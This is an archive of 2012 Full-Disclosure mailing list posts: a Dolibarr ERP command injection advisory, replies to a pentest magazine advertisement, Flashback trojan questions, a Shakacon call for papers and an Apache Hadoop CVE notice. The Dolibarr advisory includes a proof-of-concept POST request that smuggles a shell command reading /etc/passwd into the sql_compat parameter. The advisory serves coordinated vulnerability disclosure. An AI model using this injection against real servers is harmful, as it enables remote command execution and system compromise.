[Full-disclosure] Dolibarr ERP & CRM OS Command Injection

[Nahuel Grisolia]

Dolibarr ERP & CRM OS Command Injection
===

1. Advisory Information
Date published: 2012-4-6
Vendors contacted: Dolibarr
Release mode: Coordinated release

2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. Software Description
Dolibarr ERP & CRM is a modern web software to manage your activity (contacts, 
invoices, orders, stocks, agenda, etc...). It's an opensource and free software 
designed for small companies, foundations and freelances.

4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data 
is sent to an interpreter as part of a command or query. The attacker’s hostile 
data can trick the interpreter into executing unintended commands or accessing 
unauthorized data.

5. Vulnerable packages
Dolibarr <= 3.1.1
Dolibarr <= 3.2.0

6. Non-vulnerable packages
Vendor said that the vulnerability was fixed in Development version of 3.2.X 
branch. However, the fix for 3.1.X branch will be published by June. Vendor 
accepted the public disclosure of this vulnerability.

7. Credits
This vulnerability was discovered by Nahuel Grisolia 
( nahuel @ cintainfinita.com.ar )

8. Technical Description
8.1. OS Command Injection – PoC Example
CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Dolibarr is prone to remote command execution vulnerability because the 
software fails to adequately sanitize user-supplied input.
A command injection attack can be executed if specially crafted parameters are 
sent. 
Successful attacks can compromise the affected Web Server and its software.
The following proof of concept is given:
POST /dolibarr/admin/tools/export.php HTTP/1.1
[…]
Cookie: DOLSESSID_[…]=[…]

token=[...]&export_type=server&what=mysql&mysqldump=%2Fusr%2Fbin%2Fmysqldump&use_transaction=yes&disable_fk=yes&sql_compat=;cat
/etc/passwd > 
/tmp/cintainfinitapasswd;&sql_structure=structure&drop=1&sql_data=data&showcolumns=yes&extended_ins=yes&delayed=yes&sql_ignore=yes&hexforbinary=yes&filename_template=mysqldump_dolibarrdebian_3.1.1_201203231716.sql&compression=none


9. Report Timeline
* 2012-03-26 / Vendor notification
* 2012-03-27 / Vulnerability details sent to Vendor
* 2012-03-27 / Vendor fix – See 6. Non-vulnerable packages
* 2012-04-06 / Public Disclosure – PoC attached
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PenTest Market is for FREE Now

[Dave]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 05/04/2012 15:28, Krzysztof Marczyk wrote:
> We have great news for you. You can have PenTest Market for free now. Just
> create a free account and enjoy 50 pages of PenTest Market for FREE every
> month!  Register now from this link:
> http://pentestmag.com/wp-login.php?action=register
> 
> For those who didn’t have the opportunity to become familiar with PenTest
> Market – this is a new magazine devoted exclusively to pentesting/ IT
> security business. If you wonder: What emplyers expect from pentesters/ IT
> security specialists? How to become a pentester/ IT security specialist?
> How to recruit ideal pentester/ IT security specialist? How does
> pentesting/ IT security market work? How to start your own IT security
> company? What do clients expect from pentesting services? - this magazine
> is exactly for you!
> 
> Create an account for free and Download PenTest Market for Free!
> http://pentestmag.com/wp-content/uploads/downloads/2012/04/vol1-no1-March2012-PenTestMarket-yes.jpg.pdf


I'm a noob and there is nothing in this magazine I don't already know.
Although your mag might just enlighten the very clueless to some small extent.
Full disclosure is not the place to promote your advertisement riddled magazine.

This publication needs to target not pen testers and security specialists, but 
the clueless middle and upper management with business degrees
and little understanding of IT security.

There are real professionals here, proper coders and hackers, people with 
genuine skills (myself not included).
Can you imagine how they see your publication?

Regards
Dave

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBT39ts7Ivn8UFHWSmAQLC2wgAny++Xs55UEJ0tQrkT2KO1nkHFlx+g4Yp
XZ0AnQljkd1q5BAIHMofnfSkFtRDUa07X0pxFJGynyh8k0t/p33ldSadHuHWUbH4
HNDbjn37xYzqaRuOIU6713LGkF9o8GRTJp2jum19P/taxzu8X5cOPS4kxKFlTygW
RKq6no0hq7Dpz7l8AUsqMxcPQhDxECeIBi1bFwVdrFYoaCaZh8tm1+d9eDv3/Hrp
Emn6kilWvf4azCDgCps3biQvQgZMY80g6kt5MC8db4RswDCr1EUKmx+2S4a1x1Rv
n+Kig+NgD+n1zsRuWDYAo9yhG/euDDUbs0rbMjMlcKx1ZBSviN7SoA==
=fLrE
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PenTest Market is for FREE Now

[John Jacobs]

> {SNIP} If you wonder: What emplyers expect
> from pentesters/ IT security specialists?

Would it be premature of me to think one of the things "emplyers [sic]" would 
expect would be proper spelling and proofreading, especially when making a 
product announcement peddling my wares?

Cheers,
John Jacobs
  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PenTest Market is for FREE Now

[Krzysztof Marczyk]

We have great news for you. You can have PenTest Market for free now. Just
create a free account and enjoy 50 pages of PenTest Market for FREE every
month!  Register now from this link:
http://pentestmag.com/wp-login.php?action=register

For those who didn’t have the opportunity to become familiar with PenTest
Market – this is a new magazine devoted exclusively to pentesting/ IT
security business. If you wonder: What emplyers expect from pentesters/ IT
security specialists? How to become a pentester/ IT security specialist?
How to recruit ideal pentester/ IT security specialist? How does
pentesting/ IT security market work? How to start your own IT security
company? What do clients expect from pentesting services? - this magazine
is exactly for you!

Create an account for free and Download PenTest Market for Free!
http://pentestmag.com/wp-content/uploads/downloads/2012/04/vol1-no1-March2012-PenTestMarket-yes.jpg.pdf
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Drop box

[Fatherlaptop]

Ever do a google query for public and or shared files? 

From: Randy

It's an iPhone Thang!
Was learning cursive necessary?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] mac trojan

[Carl "Thomas" Guething]

http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml

Regards,
T

On Thu, Apr 5, 2012 at 10:30 AM, RandallM  wrote:

> can someone tell me what effects there are to being infected with
> flashback? signs? google search just brings up the same same news
> stories.
>
> also, if one is.. it seems there are some files that cannot be
> recovered so new install necessary?
>
> --
> been great, thanks
> RandyM
> a.k.a System
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Shakacon CFP - Extended Deadline: April 13, 2012

[Shakacon]

Thanks to everyone for all the submissions received and the committee is
evaluating them for selection.  If you are on the fence about submitting
remember - All selected speakers will  receive compensation to cover
Airfare and 2 hotel nights in Honolulu, Hawaii.  Not to mention you get
to hang out with a great group of people in a laid back locale.  We are
extending the CFP deadline to April 13, 2012 in the hopes of receiving a
few more submissions.


Shakacon IV  - Honolulu Hawaii

"Sun, Surf, and C Shells"

  CALL FOR PAPERS

 http://www.shakacon.org/cfp.txt


Who: Shakacon Crew
What:Shakacon IV
When:June 18-21 2012
Where:   Paradise aka Honolulu Hawaii (nuff said)
Why: Why NOT?
How: By plane, boat, canoe, yacht, hydrofoil, stand-up paddle board,
jetski, 
 long board, dolphin, whale sled, nuclear submarine, etc.


[Overview]

After taking two years off to work on our surfing skills we decided it
was time to bring some top notch technical talent back to one of the
most remote locations on earth.  

Sitting around somewhere freezing your a$$ off?  Dreaming about warm
days, rainbows, decadent tropical drinks sipped out of coconuts? Sure
you could drop your 0day in Vegas, bring down the Internet in Germany,
or satisfy your dark desires in Asia; however, wouldn't you rather
submit your research or topics to our CFP and maybe win yourself a paid
trip to Hawaii?  

The Shakacon security conference is a laid back conference where
industry, government, academia and independent experts will get together
to share knowledge and experience in one of the most beautiful places on
Earth.  

Shakacon will offer local, national, and international participants a
casual, social, learning environment designed to present a "holistic"
security view and the opportunity to network with peers and fellow
enthusiasts in a relaxed setting.  Leave your ego at the airport (or
shoreline if you come in via another method) as we look forward to
attendees varying in skill level from N00b to Ninja.
  
During the day, sessions will include: best practices, case studies,
research projects, etc. 
covering all different aspects of the information security landscape.
There will be something for everyone and if sitting through talks isn't
your cup of kava, there will be exciting events and contests for you to
sharpen your skills and knowledge on.



[Trainer Opportunities]

Don't want to speak at the Con but have an uncanny ability to teach and
a proven track record for delivering quality courseware and want to come
to Hawaii? We're also interested in bringing in trainers to provide
world class training leading up to Shakacon (June 18 and 19). Submit a
synopsis/class agenda, prior teaching experience, and maybe get selected
to teach in Hawaii.


 
[CFP Details]

(1) Abstract for papers must be submitted to the review committee by
_April 13, 2012_.

(2) Selection notification will occur by _April 20, 2012_ and abstracts
posted to the site by _April 27, 2012_.

(3) Full Slides for your papers must be submitted by _May 18, 2012_.

CFP Review Committee:

Caleb Sima
Katie Mossouris
Val Smith
Matthieu Suiche
Vincenzo Iozzo
Kent Backman
Jonathan Brossard
Daniel Hodson
Kris Harms
Mark Ryan Talabis
Chris Potter
Jason Martin

There are a limited number of speaking sessions for which the conference
organizers will provide travel and accommodations so please submit your
abstract early if you are interested in speaking.  Speaking slots will
be 55 minutes long (45 minutes for your talk and 10 minutes for Q&A);
however, we will accept "turbo" talk submissions and if we have enough
we'll blend them into a block of the conference.

The audience will be a broad mix of professional, academic, and
enthusiast, so we welcome both technical and non-technical submissions
on all aspects of security.  The key criteria are practicality and
timeliness.  
We want to provide our attendees with up to date materials they can take
away and immediately gain benefit from as well as new research or tools.
Absolutely NO SALES presentations will be accepted.



Proposals should include:
 

 
"Shakacon CFP Submission: , "


1. Name, address, and contact info.
2. Employer and/or affiliations.
3. Brief biography.
4. Presentation experience.
5. Topic summary.
6. Reason this topic should be considered.
7. Other publications or conferences where this material has been or
will be published/submitted.
  
Please include plain text of all information provided in the body of
your email as well as any file attachments. 
The plain text information will be reviewed first to find the most
suitable candidates.

Please forward the above information to cfp at shakacon.org
  in order to be considered.


  
More conference information, registration details, and travel partner
deals will be posted to:
 
http://www.shakacon.org

Fo

Re: [Full-disclosure] [funsec] mac trojan

[Charlie Derr]

On 04/05/2012 10:30 AM, RandallM wrote:
> can someone tell me what effects there are to being infected with
> flashback? signs? google search just brings up the same same news
> stories.
>
> also, if one is.. it seems there are some files that cannot be
> recovered so new install necessary?
>

No personal experience (yet) but perhaps this will be helpful:

http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [CVE-2012-1574] Apache Hadoop user impersonation vulnerability

[Aaron T. Myers]

Hello,

Users of Apache Hadoop should be aware of a security vulnerability recently
discovered, as described by the following CVE. In particular, please note
the "Users affected", "Versions affected", and "Mitigation" sections.

Best,
Aaron

--
Aaron T. Myers
Software Engineer, Cloudera

CVE-2012-1574: Apache Hadoop user impersonation vulnerability

Severity: Critical

Vendor: The Apache Software Foundation

Versions Affected:
Hadoop 0.20.203.0, 0.20.204.0, and 0.20.205.0
Hadoop 1.0.0 to 1.0.1
Hadoop 0.23.0 to 0.23.1.

Users affected: Users who have enabled Hadoop's Kerberos/MapReduce security
features.

Impact: Vulnerability allows an authenticated malicious user to impersonate
any other user on the cluster.

Mitigation:
0.20.20x.x and 1.0.x users should upgrade to 1.0.2
0.23.x users should upgrade to 0.23.2 when it becomes available

Credit:
This issue was discovered by Aaron T. Myers of Cloudera.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/